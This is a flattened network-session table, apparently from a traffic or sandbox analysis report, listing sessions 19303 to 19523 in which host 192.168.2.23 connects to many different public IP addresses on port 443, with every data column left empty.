                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19303192.168.2.2351392150.31.24.26443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19304192.168.2.2351064106.209.157.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19305192.168.2.233557418.158.30.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19306192.168.2.2358758113.10.150.7443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19307192.168.2.2353660157.123.175.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19308192.168.2.234558218.86.175.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19309192.168.2.235362045.174.137.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19310192.168.2.234837692.143.222.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19311192.168.2.233958085.32.156.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19312192.168.2.2339576118.75.114.194443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19313192.168.2.235134878.146.240.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19314192.168.2.2345322145.226.13.159443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19315192.168.2.2352818143.21.110.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19316192.168.2.234719299.22.92.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19317192.168.2.235121845.140.196.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19318192.168.2.2338840223.219.217.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19319192.168.2.233871691.84.99.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19320192.168.2.2335468107.204.237.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19321192.168.2.2335976189.106.73.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19322192.168.2.235654470.66.107.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19323192.168.2.2350414180.205.110.204443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19324192.168.2.2349506169.22.194.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19325192.168.2.2356608173.206.70.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19326192.168.2.235987292.30.7.139443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19327192.168.2.234751223.223.2.78443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19328192.168.2.2335908207.168.78.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19329192.168.2.235001679.150.107.194443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19330192.168.2.233587288.90.114.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19331192.168.2.2349428123.151.28.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19332192.168.2.234718062.40.30.117443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19333192.168.2.233666836.67.165.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19334192.168.2.235392064.183.90.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19335192.168.2.2334098128.6.233.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19336192.168.2.2349144210.8.63.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19337192.168.2.2350430159.222.103.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19338192.168.2.2352170140.151.208.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19339192.168.2.234555212.23.47.169443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19340192.168.2.2351070139.201.210.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19341192.168.2.2339010163.150.111.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19342192.168.2.2335730199.222.101.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19343192.168.2.2349716194.110.106.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19344192.168.2.233297453.94.155.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19345192.168.2.233999893.252.10.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19346192.168.2.234500685.182.62.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19347192.168.2.2338604181.126.207.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19348192.168.2.2346050176.212.255.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19349192.168.2.233386084.124.124.39443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19350192.168.2.2351078109.167.209.117443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19351192.168.2.2342572182.219.213.5443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19352192.168.2.234138212.226.168.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19353192.168.2.2356090205.41.127.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19354192.168.2.2349010119.186.43.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19355192.168.2.2352310136.64.126.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19356192.168.2.2344380223.148.40.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19357192.168.2.2334294204.44.34.119443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19358192.168.2.235539065.214.39.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19359192.168.2.2344142218.4.205.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19360192.168.2.233718095.131.187.41443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19361192.168.2.234869090.103.137.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19362192.168.2.23564229.129.33.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19363192.168.2.2346608143.151.200.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19364192.168.2.235182243.27.154.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19365192.168.2.2355832160.194.181.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19366192.168.2.234982264.111.116.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19367192.168.2.2342948169.38.39.194443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19368192.168.2.2354080117.4.88.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19369192.168.2.235791891.254.197.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19370192.168.2.2336952221.71.44.80443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19371192.168.2.234100435.8.225.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19372192.168.2.2355180159.203.107.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19373192.168.2.234796032.27.26.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19374192.168.2.2342588130.95.173.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19375192.168.2.233783896.102.68.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19376192.168.2.234053270.81.21.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19377192.168.2.234600869.80.244.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19378192.168.2.2337898132.12.221.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19379192.168.2.233551848.208.175.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19380192.168.2.2335992213.53.189.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19381192.168.2.2339366157.186.32.74443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19382192.168.2.235698085.140.81.243443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19383192.168.2.2352262131.123.120.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19384192.168.2.233735475.15.129.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19385192.168.2.2350640222.252.145.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19386192.168.2.2336258102.58.187.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19387192.168.2.2339534189.91.245.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19388192.168.2.2336274160.233.91.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19389192.168.2.2349976140.251.149.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19390192.168.2.2355786108.237.93.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19391192.168.2.2343004172.97.169.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19392192.168.2.2334748125.90.194.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19393192.168.2.2348004193.196.36.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19394192.168.2.233617097.228.198.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19395192.168.2.234601638.130.155.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19396192.168.2.2337906149.247.17.134443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19397192.168.2.2342366166.52.220.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19398192.168.2.2345608165.218.61.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19399192.168.2.2338290164.136.92.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19400192.168.2.2337068101.126.77.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19401192.168.2.233518891.193.13.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19402192.168.2.235437640.194.201.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19403192.168.2.2338502217.74.17.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19404192.168.2.2338660211.171.184.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19405192.168.2.235507442.127.76.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19406192.168.2.233426265.203.80.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19407192.168.2.235078461.248.222.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19408192.168.2.2351038170.29.7.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19409192.168.2.2337672132.202.6.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19410192.168.2.2355298177.125.195.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19411192.168.2.2352026217.125.213.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19412192.168.2.235617276.144.49.167443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19413192.168.2.234183453.143.233.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19414192.168.2.235230244.250.116.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19415192.168.2.2338724172.41.177.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19416192.168.2.234933414.89.68.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19417192.168.2.234627642.13.0.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19418192.168.2.2360306122.34.247.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19419192.168.2.2348900179.247.182.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19420192.168.2.2351570151.124.166.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19421192.168.2.235445092.90.130.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19422192.168.2.2333904186.157.49.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19423192.168.2.2345654102.126.28.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19424192.168.2.2351836205.239.118.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19425192.168.2.233414240.141.204.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19426192.168.2.2348248164.252.17.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19427192.168.2.2345608181.157.218.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19428192.168.2.2342974144.17.188.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19429192.168.2.233771282.11.166.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19430192.168.2.2336396100.162.140.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19431192.168.2.2341694101.163.98.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19432192.168.2.2354060156.89.169.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19433192.168.2.235660050.192.50.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19434192.168.2.2345606220.138.31.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19435192.168.2.234900870.45.240.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19436192.168.2.233902241.34.102.196443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19437192.168.2.234109850.66.217.174443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19438192.168.2.234683059.103.189.134443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19439192.168.2.2342022106.18.107.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19440192.168.2.2353068204.164.89.116443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19441192.168.2.233655490.146.41.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19442192.168.2.2344998220.211.86.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19443192.168.2.2360790154.26.130.48443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19444192.168.2.233575058.132.250.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19445192.168.2.2342684136.21.155.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19446192.168.2.2359248162.203.47.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19447192.168.2.2349114138.240.9.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19448192.168.2.2339230187.123.233.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19449192.168.2.2355444101.22.27.93443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19450192.168.2.234485636.129.243.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19451192.168.2.235058880.71.207.68443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19452192.168.2.2357988208.156.16.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19453192.168.2.2356926105.74.48.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19454192.168.2.234392276.250.9.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19455192.168.2.235958047.12.132.74443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19456192.168.2.2357114103.31.190.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19457192.168.2.2356218111.33.141.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19458192.168.2.236004837.224.12.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19459192.168.2.2347722122.32.179.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19460192.168.2.2356514121.197.241.16443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19461192.168.2.234221272.176.68.233443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19462192.168.2.233977096.111.127.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19463192.168.2.2341990162.252.100.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19464192.168.2.2358836200.3.84.160443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19465192.168.2.234503037.50.221.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19466192.168.2.233482877.232.17.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19467192.168.2.234204645.207.127.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19468192.168.2.235401085.161.120.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19469192.168.2.2334378205.2.129.148443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19470192.168.2.235871640.215.243.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19471192.168.2.2341760193.234.236.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19472192.168.2.233382089.116.14.16443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19473192.168.2.233298617.116.84.117443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19474192.168.2.2333982150.25.216.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19475192.168.2.2358030216.214.210.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19476192.168.2.2358412133.74.60.29443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19477192.168.2.2337012207.1.55.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19478192.168.2.2359706135.76.195.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19479192.168.2.2340652176.195.242.74443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19480192.168.2.235869496.74.74.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19481192.168.2.2336074207.124.202.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19482192.168.2.23334185.17.195.30443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19483192.168.2.234548269.162.81.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19484192.168.2.2341156137.60.209.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19485192.168.2.233998664.138.51.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19486192.168.2.233633648.228.38.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19487192.168.2.2350528185.159.146.212443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19488192.168.2.2359828108.38.123.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19489192.168.2.2339814108.118.188.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19490192.168.2.234905099.185.63.52443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19491192.168.2.235931665.130.141.26443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19492192.168.2.235438065.133.13.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19493192.168.2.235938254.12.65.30443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19494192.168.2.233853689.56.51.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19495192.168.2.2337624107.250.34.3443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19496192.168.2.2349054151.31.12.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19497192.168.2.2333924113.205.13.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19498192.168.2.2339570177.16.105.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19499192.168.2.234012432.13.188.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19500192.168.2.234623276.202.21.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19501192.168.2.2335394137.162.47.91443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19502192.168.2.2342934191.87.187.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19503192.168.2.2337656132.196.74.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19504192.168.2.234414834.203.67.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19505192.168.2.2354848123.146.91.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19506192.168.2.2354262125.35.146.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19507192.168.2.2348448183.222.81.60443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19508192.168.2.2360426161.192.244.96443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19509192.168.2.2359246183.88.73.134443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19510192.168.2.234710423.91.66.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19511192.168.2.234152487.98.114.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19512192.168.2.235885227.195.145.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19513192.168.2.2358166121.6.83.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19514192.168.2.2341774166.105.34.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19515192.168.2.2342502112.136.119.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19516192.168.2.2352056218.168.83.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19517192.168.2.2342164121.198.18.174443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19518192.168.2.233725496.10.110.169443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19519192.168.2.2353150212.76.123.197443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19520192.168.2.234572865.230.6.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19521192.168.2.235117241.86.68.90443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19522192.168.2.2339962130.212.154.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19523192.168.2.2340176128.32.49.230443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
